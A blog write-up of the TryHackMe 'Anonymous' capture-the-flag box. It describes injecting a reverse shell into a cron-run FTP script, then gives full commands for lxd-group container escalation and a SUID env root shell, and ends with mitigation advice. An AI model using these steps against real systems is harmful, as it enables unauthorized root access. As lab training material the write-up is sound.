Anonymous Write-up

Description

Anonymous is a boot2root CTF on TryHackMe. It has medium difficulty. Initial access has been accomplished through injecting a reverse shell into a script on the FTP server. This script was run by a cronjob. After that privilege escalation to root was done via a misconfigured SUID binary.

Enumeration

First of all we start a Nmap scan against the target.

sudo nmap 10.10.237.17 -sC -sV -p- -O -oN nmap/all

The SMB share can be enumerated with the smbclient command. First of all the shares are listed.

smbclient -L //10.10.237.17/

In the next step the contents of the share was downloaded to the attacker machine. But these images did not contain any valuable information.

smbclient //10.10.237.17/<share_name>/

On the FTP server anonymous login is allowed.

The FTP server contains a scripts folder. We have full access to this folder. Inside this folder there are three files. To be able to analyze these files, these files are downloaded to the attacker machine.

The to_do.txt file does not contain any valuable information.

But the clean.sh and the removed_files.log do.

Initial Access

In the next step a reverse shell was placed into clean.sh.

After that the file was uploaded to the FTP server.

Next a listener was started with pwncat. After waiting for a while, the box has connected to the listener.

Privilege Escalation

In the picture above, it can be clearly seen that the user namelessone is part of the “lxd” group. This can be abused to gain a root shell. This website describes how this can be accomplished. First of all a container will be created on the attacker machine by running the following commands:

sudo apt updatesudo apt install -y golang-go debootstrap rsync gpg squashfs-toolsgo get -d -v github.com/lxc/distrobuildercd $HOME/go/src/github.com/lxc/distrobuildermakecdmkdir -p $HOME/ContainerImages/alpine/cd $HOME/ContainerImages/alpine/wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yamlsudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

Finally these files should be inside ~/ContainerImages/alpine:

Now these files have to be uploaded to the target. This can be easily accomplished with pwncat. After pressing CTR + D the following commands will upload the lxd.tar.xz and the rootfs.squashfs files inside the tmp folder of the target.

upload /home/kali/ContainerImages/alpine/lxd.tar.xz /tmp
upload /home/kali/ContainerImages/alpine/rootfs.squashfs /tmp

After that press CTR + D again to get the shell as namelessone.

Now the container has to build on the victim machine with the following commands.

cd /tmplxc image import lxd.tar.xz rootfs.squashfs — alias alpinelxd initlxc init alpine privesc -c security.privileged=truelxc config device add privesc host-root disk source\=/ path\=/mnt/root recursive\=true

Finally the container will be executed.

lxc start privesclxc exec privesc /bin/sh

Unfortunately I was not able to get the root flag with this way. So another privilege escalation had to be found. To find another attack vector the LinEnum script has been used. This script is located /opt/LinEnum/LinEnum.sh on my machine. It can be easily uploaded to the victim with pwncat.

upload /opt/LinEnum/LinEnum.sh /tmp/LinEnum.sh

Now it can be run from the /tmp directory.

bash LinEnum.sh

This script will also output binaries with the SUID bit set. Fortunately the env binary has the SUID bit set.

This can be used to elevate privileges to root.

env /bin/sh -p

Mitigation

The FTP server should not allow anonymous login. If anonymous login is needed, then the anonymous user should not have access to sensitive information. Also an anonymous user should not have the privilege to write into an FTP folder. Furthermore namelessone should not be part of the lxd group, if not needed. Also the misconfiguration of the env binary should be fixed.

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DPPA Founding Member, Shereen Shermak Discusses How Technology is Key to Improving Privacy

TotemFi’s Week in Review

{UPDATE} Collector de Noël Hack Free Resources Generator

How BAT fuels a fairer advertising ecosystem

SECURITY FEATURES FOR USERS TO ENHANCE THEIR EXPERIENCE

Capture The Flag (CTF) 🚩

Nikto-Penetration testing

The Chicken keeps laying new eggs: uncovering new GC MaaS tools used by top-tier threat actors

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

THM — Lockdown Write-Up

THM Pickle Rick writeup

Celestial Writeup

Red Team Recon — TryHackMe Writeup